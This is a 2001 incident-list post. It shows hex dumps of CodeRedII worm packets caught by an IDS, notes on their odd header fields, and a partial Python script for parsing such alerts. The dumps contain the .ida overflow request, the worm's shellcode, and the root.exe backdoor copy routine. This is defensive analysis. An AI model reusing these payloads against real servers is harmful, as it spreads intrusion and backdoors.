STRANGE CodeRedII packets from only one host

From: Deterding, Brent D (bddeteat_private)
Date: Mon Aug 06 2001 - 08:35:32 PDT

    Hey all,
    	As a follow-up to what I posted before, here's what I'm seeing
    from a single host:
    
    1. .ida attempt dlen=576 length=536 win=5360 TOS=0 TTL=124 Seq=[...]0257
    Ack=[...]0956 chksum=58853 ACK
    <identical packet>
    2. .ida attempt dlen=564 length=479 win=6432 TOS=16 TTL=255
    Seq=[...]9607 Ack=[...]9607 chksum=55438 ACK-PSH
    <identical packet>
    
    3. coderedII attempt dlen=576 length=536 win=5360 TOS=0 TTL=124
    Seq=[...]0793 Ack=[...]0956 chksum=58852 ACK
    <identical packet>
    4. coderedII attempt dlen=413 length=373 win=7504 TOS=16 TTL=255
    Seq=[...]4487 Ack=[...]3863 chksum=40789 ACK-PSH
    <identical packet>
    
    5. cmd.exe access dlen=576 length=536 win=5360 TOS=0 TTL=124
    Seq=[...]1865 Ack=[...]0956 chksum=58849 ACK
    <identical packet>
    6. cmd.exe access dlen=981 length=941 win=10720 TOS=16 TTL=255
    Seq=[...]2071 Ack=[...]4871 chksum=40339 ACK-PSH
    <identical packet>
    
    Note:
    	Each "series" is from the same src port
    	Packet #2 has same seq/ack #s
    	Packet #2 has a strange dlen=564 while length=479
    	The first packet in each attack (#1, #3, #5) is nearly
    identical; even the ack #
    	Also note window=5360 when length=536 (10x)
    	TTLs go from 124->255 between the first and second packets
    	TOS goes from 0->16 between the first and second packets
    
    The full traces are below. The source is in the same class A as I (cable
    modem). Any ideas?
    
    -- Brent Deterding
    	
    
    #(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552]  WEB-IIS ISAPI .ida attempt
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124 chksum=58853
    TCP:  port=1894 -> dport: 80  flags=***A**** seq=1997560257
          ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530
    Payload:  length = 536
    
    000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
    010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   ?XXXXXXXXXXXXXXX
    020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   X%u9090%u6858%uc
    100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
    110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
    120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
    130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
    140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
    150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
    160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
    170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
    180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
    190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F   ype: text/xml.Co
    1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33   ntent-length: 33
    1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00   79 ........`....
    1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00   ....dg.6..dg.&..
    1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF   .....h......\...
    1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40   P.U...\...P.U..@
    1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00   .....X....U.=...
    200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6   ....=...........
    210 : C9 89 8D 54 FE FF FF 8B                           ...T....
    ------------------------------------------------------------------------------
    <identical packet to above>
    ------------------------------------------------------------------------------
    #(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552]  WEB-IIS ISAPI .ida attempt
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438
    TCP:  port=1894 -> dport: 80  flags=***AP*** seq=3243839607
          ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658
    Payload:  length = 479
    
    000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
    010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   ?XXXXXXXXXXXXXXX
    020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58   XXXXXXXXXXXXXXXX
    0f0 : 58 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   X.090.858.bd3.80
    100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
    110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   1.090.858.bd3.80
    120 : 31 00 30 39 30 00 30 39 30 00 31 39 30 00 30 63   1.090.090.190.0c
    130 : 33 00 30 30 33 00 62 30 30 00 33 31 62 00 33 66   3.003.b00.31b.3f
    140 : 66 00 30 37 38 00 30 30 30 00 30 3D 61 20 20 48   f.078.000.0=a  H
    150 : 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74   TTP/1.0..Content
    160 : 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A   -type: text/xml.
    170 : 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20   Content-length: 
    180 : 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03   3379 ........`..
    190 : 00 00 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26   ......dg.6..dg.&
    1a0 : 00 00 E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE   .......h......\.
    1b0 : FF FF 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98   ..P.U...\...P.U.
    1c0 : 8B 40 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04   .@.....X....U.=.
    1d0 : 04 00 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A      ......=........
    ------------------------------------------------------------------------------
    <identical packet to above>
    ------------------------------------------------------------------------------
    #(1 - 8926) [2001-08-05 19:45:38]  CodeRedII Overflow
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124 chksum=58852
    TCP:  port=1894 -> dport: 80  flags=***A**** seq=1997560793
          ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961
    Payload:  length = 536
    
    000 : 75 08 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7   u..~0...........
    010 : 46 30 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52   F0.........CodeR
    020 : 65 64 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95   edII...$.U.f....
    030 : 85 38 FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A   .8.....P.......j
    040 : 00 8D 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B   ...P...P..8...P.
    050 : 45 08 FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF   E..p.........8..
    060 : FF 01 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD   ..thS.U..U..E.i.
    070 : 54 FE FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2   T...,.....,.....
    080 : 04 00 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A   .........F4.E.Pj
    090 : 00 FF 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00   ..u...........j.
    0a0 : 6A 00 FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00   j..U.P.U.Ou..;..
    0b0 : 00 69 BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26   .i.T....\&....\&
    0c0 : 05 57 FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55   .W.U.j.j..U.j..U
    0d0 : E8 EB F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85   ....F4)E.jd.U...
    0e0 : 3C FE FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D   <...P.U....<...=
    0f0 : D2 07 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A   ....s....>......
    100 : 73 C3 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF   s.f..p.....f..r.
    110 : FF FF 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A   ...P.d.....t...j
    120 : 00 6A 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80   .j.j..U....t..E.
    130 : 6A 01 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A   j.Th~f...u..U.Yj
    140 : 10 8D 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01   ...p...P.u..U...
    150 : 00 00 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00   .....tK3..U.=3'.
    160 : 00 75 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C   .u?..h.........l
    170 : FF FF FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00   .........`......
    180 : 00 8B 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF   ..E...d.....h...
    190 : 50 6A 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55   Pj...`...Pj.j..U
    1a0 : A0 93 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4   ..j.Th~f...u..U.
    1b0 : 59 83 FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00   Y...u1.....X-...
    1c0 : 00 6A 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D   .j.h....P.u..U.=
    1d0 : EA 0E 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF   ....u.j.j...\...
    1e0 : 50 FF 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE   P.u..U..u..U....
    1f0 : FF FF BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00   ......w.........
    200 : 00 00 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00   ..xu......`.....
    210 : 8B 64 24 08 64 67 8F 06                           .d$.dg..
    ------------------------------------------------------------------------------
    <identical packet to above>
    ------------------------------------------------------------------------------
    #(1 - 8928) [2001-08-05 19:45:38]  CodeRedII Overflow
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=16 dlen=413 ID=0 flags=0 offset=0 TTL=255 chksum=40789
    TCP:  port=1894 -> dport: 80  flags=***AP*** seq=3462074487
          ack=3646623863 off=5 res=0 win=7504 urp=0 chksum=59337
    Payload:  length = 373
    
    000 : CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30   ......T....u..~0
    010 : 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00   ...........F0...
    020 : 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 49 49 00   ......CodeRedII.
    030 : 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF   ..$.U.f.....8...
    040 : C7 85 50 FE FF FF 01 00 00 00 6A 00 8D 85 50 FE   ..P.......j...P.
    050 : FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08   ..P..8...P.E..p.
    060 : FF 90 84 00 00 00 80 BD 38 FE FF FF 01 74 68 53   ........8....thS
    070 : FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C   .U..U..E.i.T...,
    080 : 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0   .....,..........
    090 : 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8   ....F4.E.Pj..u..
    0a0 : 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0   .........j.j..U.
    0b0 : 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE   P.U.Ou..;...i.T.
    0c0 : FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8   ...\&....\&.W.U.
    0d0 : 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46   j.j..U.j..U....F
    0e0 : 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50   4)E.jd.U...<...P
    0f0 : FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07 00 00 73   .U....<...=....s
    100 : CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85   ....>......s.f..
    110 : 70 FF FF FF 02 00 66 C7 85 72 FF FF FF 00 50 E8   p.....f..r....P.
    120 : 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02   d.....t...j.j.j.
    130 : FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E   .U....t..E.j.Th~
    140 : 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF   f...u..U.Yj...p.
    150 : FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0   ..P.u..U........
    160 : 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 3F C7 85   tK3..U.=3'..u?..
    170 : 68 FF FF FF 0A                                    h....
    ------------------------------------------------------------------------------
    <identical packet to above>
    ------------------------------------------------------------------------------
    #(1 - 8930) [2001-08-05 19:45:38]  WEB-IIS cmd.exe access
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=0 dlen=576 ID=54383 flags=0 offset=0 TTL=124 chksum=58849
    TCP:  port=1894 -> dport: 80  flags=***A**** seq=1997561865
          ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=1862
    Payload:  length = 536
    
    000 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
    010 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
    020 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
    030 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63   .E......ioctlsoc
    040 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00   ket..u..U..E....
    050 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8   ..connect..u..U.
    060 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF   .E......select..
    070 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E   u..U..E......sen
    080 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00   d..u..U..E......
    090 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C   recv..u..U..E...
    0a0 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF   ...gethostname..
    0b0 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74   u..U..E......get
    0c0 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55   hostbyname..u..U
    0d0 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C   ..E......WSAGetL
    0e0 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89   astError..u..U..
    0f0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
    100 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
    110 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
    120 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89   ..E...E.i.....@.
    130 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8   E....xV4........
    140 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF   ....<.t.<.t.....
    150 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC   ................
    160 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF   ................
    170 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF   ..... ..........
    180 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF   ................
    190 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7   .........Y...#..
    1a0 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB   .#.X......t...
    1b0 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00   .t.;.X...t..h...
    1c0 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE   ...\...P.U....\.
    1d0 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
    1e0 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
    1f0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
    200 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
    210 : 85 5C FE FF FF 50 FF 55                           .\...P.U
    ------------------------------------------------------------------------------
    <identical packet to above>
    ------------------------------------------------------------------------------
    #(1 - 8932) [2001-08-05 19:45:38]  WEB-IIS cmd.exe access
    IPv4: 24.217.103.179 -> 192.168.1.50
          hlen=5 TOS=16 dlen=981 ID=0 flags=0 offset=0 TTL=255 chksum=40339
    TCP:  port=1894 -> dport: 80  flags=***AP*** seq=777982071
          ack=560074871 off=5 res=0 win=10720 urp=0 chksum=22666
    Payload:  length = 941
    
    000 : 00 00 00 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC   ...CopyFileA..u.
    010 : FF 55 F8 89 45 DC E8 10 00 00 00 47 6C 6F 62 61   .U..E......Globa
    020 : 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55   lFindAtomA..u..U
    030 : F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41   ..E......GlobalA
    040 : 64 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45   ddAtomA..u..U..E
    050 : D4 E8 0C 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C   ......CloseHandl
    060 : 65 00 FF 75 FC FF 55 F8 89 45 D0 E8 08 00 00 00   e..u..U..E......
    070 : 5F 6C 63 72 65 61 74 00 FF 75 FC FF 55 F8 89 45   _lcreat..u..U..E
    080 : CC E8 08 00 00 00 5F 6C 77 72 69 74 65 00 FF 75   ......_lwrite..u
    090 : FC FF 55 F8 89 45 C8 E8 08 00 00 00 5F 6C 63 6C   ..U..E......_lcl
    0a0 : 6F 73 65 00 FF 75 FC FF 55 F8 89 45 C4 E8 0E 00   ose..u..U..E....
    0b0 : 00 00 47 65 74 53 79 73 74 65 6D 54 69 6D 65 00   ..GetSystemTime.
    0c0 : FF 75 FC FF 55 F8 89 45 C0 E8 0B 00 00 00 57 53   .u..U..E......WS
    0d0 : 32 5F 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 BC E8   2_32.DLL..U..E..
    0e0 : 07 00 00 00 73 6F 63 6B 65 74 00 FF 75 BC FF 55   ....socket..u..U
    0f0 : F8 89 45 B8 E8 0C 00 00 00 63 6C 6F 73 65 73 6F   ..E......closeso
    100 : 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B4 E8 0C   cket..u..U..E...
    110 : 00 00 00 69 6F 63 74 6C 73 6F 63 6B 65 74 00 FF   ...ioctlsocket..
    120 : 75 BC FF 55 F8 89 45 A4 E8 08 00 00 00 63 6F 6E   u..U..E......con
    130 : 6E 65 63 74 00 FF 75 BC FF 55 F8 89 45 B0 E8 07   nect..u..U..E...
    140 : 00 00 00 73 65 6C 65 63 74 00 FF 75 BC FF 55 F8   ...select..u..U.
    150 : 89 45 A0 E8 05 00 00 00 73 65 6E 64 00 FF 75 BC   .E......send..u.
    160 : FF 55 F8 89 45 AC E8 05 00 00 00 72 65 63 76 00   .U..E......recv.
    170 : FF 75 BC FF 55 F8 89 45 A8 E8 0C 00 00 00 67 65   .u..U..E......ge
    180 : 74 68 6F 73 74 6E 61 6D 65 00 FF 75 BC FF 55 F8   thostname..u..U.
    190 : 89 45 9C E8 0E 00 00 00 67 65 74 68 6F 73 74 62   .E......gethostb
    1a0 : 79 6E 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8   yname..u..U..E..
    1b0 : 10 00 00 00 57 53 41 47 65 74 4C 61 73 74 45 72   ....WSAGetLastEr
    1c0 : 72 6F 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00   ror..u..U..E....
    1d0 : 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4   ..USER32.DLL..U.
    1e0 : 89 45 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64   .E......ExitWind
    1f0 : 6F 77 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3   owsEx..u..U..E..
    200 : 8B 45 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04   .E.i.....@.E....
    210 : 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C   xV4............<
    220 : 00 74 F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8   .t.<.t..........
    230 : E6 FF FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8   ................
    240 : E8 D5 FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8   ................
    250 : 20 00 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF    ...............
    260 : 00 FF FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF   ................
    270 : 00 00 FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE   ....Y...#...#.X.
    280 : FF FF 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D   .....t....t.;.
    290 : 58 FE FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE   X...t..h......\.
    2a0 : FF FF 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00   ..P.U....\......
    2b0 : 00 00 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4   ..\CMD.EXE.^....
    2c0 : B3 63 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74   .cj......d:\inet
    2d0 : 70 75 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74   pub\scripts\root
    2e0 : 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF   .exe...$....\...
    2f0 : 50 FF 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72   P.U.j..+...d:\pr
    300 : 6F 67 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C   ogra~1\common~1\
    310 : 73 79 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F   system\MSADC\roo
    320 : 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF   t.exe...$....\..
    330 : FF 50 FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02   .P.U.......MZP..
    340 : 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00   ................
    350 : 00 00 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC   ...@............
    360 : 00 00 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00   ..PE..L....*%)..
    370 : 00 00 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04   ................
    380 : 00 00 00 08 00 00 00 00 00 00 00 10 00 00 00 10   ................
    390 : 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 04   ... ....@.......
    3a0 : 00 00 01 00 00 00 00 00 00 00 03 00 0A            .............
    ------------------------------------------------------------------------------
    <identical packet to above>
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
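As an added example (not part of Brent's post, nor code from the ARIS service), the following Python script parses alert dumps in the text format quoted above and runs the consistency checks behind the notes in the post: IP total length against header plus payload size, window equal to ten times the payload length, seq equal to ack, IP ID of zero, and the TTL/TOS values seen within one source-port "series". It also checks the payload for the `%u`-encoded `.ida` request and the `CodeRedII` string that the dumps show. The embedded SAMPLE is a constructed, trimmed copy of three of the posted alerts with only two hex rows each, so the captured bytes are shorter than the declared payload length and the script flags that as well; the check names are mine, the field names come from the dump format.

```python
"""Triage helper for the ARIS/Snort-style alert dumps quoted in the post.

Parses one '#(...)' alert block after another (title, IPv4/TCP header lines,
'Payload: length = N', hex rows) and runs the consistency checks behind the
anomalies noted above. SAMPLE is a constructed, trimmed copy of three of the
posted alerts: only two hex rows each, so captured bytes < declared length.
"""
import re
from collections import defaultdict

SAMPLE = """\
#(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552]  WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50
      hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124 chksum=58853
TCP:  port=1894 -> dport: 80  flags=***A**** seq=1997560257
      ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530
Payload:  length = 536
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   X%u9090%u6858%uc
#(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552]  WEB-IIS ISAPI .ida attempt
IPv4: 24.217.103.179 -> 192.168.1.50
      hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438
TCP:  port=1894 -> dport: 80  flags=***AP*** seq=3243839607
      ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658
Payload:  length = 479
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
0f0 : 58 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30   X.090.858.bd3.80
#(1 - 8926) [2001-08-05 19:45:38]  CodeRedII Overflow
IPv4: 24.217.103.179 -> 192.168.1.50
      hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124 chksum=58852
TCP:  port=1894 -> dport: 80  flags=***A**** seq=1997560793
      ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961
Payload:  length = 536
010 : 46 30 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52   F0.........CodeR
020 : 65 64 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95   edII...$.U.f....
"""

TITLE_RE = re.compile(r"^#\(\d+ - (\d+)\) \[([^\]]+)\]\s+(?:\[[^\]]+\]\s+)?(.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")              # hlen=5 TOS=0 ... seq=1997560257
HEX_RE = re.compile(r"^([0-9a-f]{3}) : (.*)$")  # 000 : 47 45 ...   GET /defa


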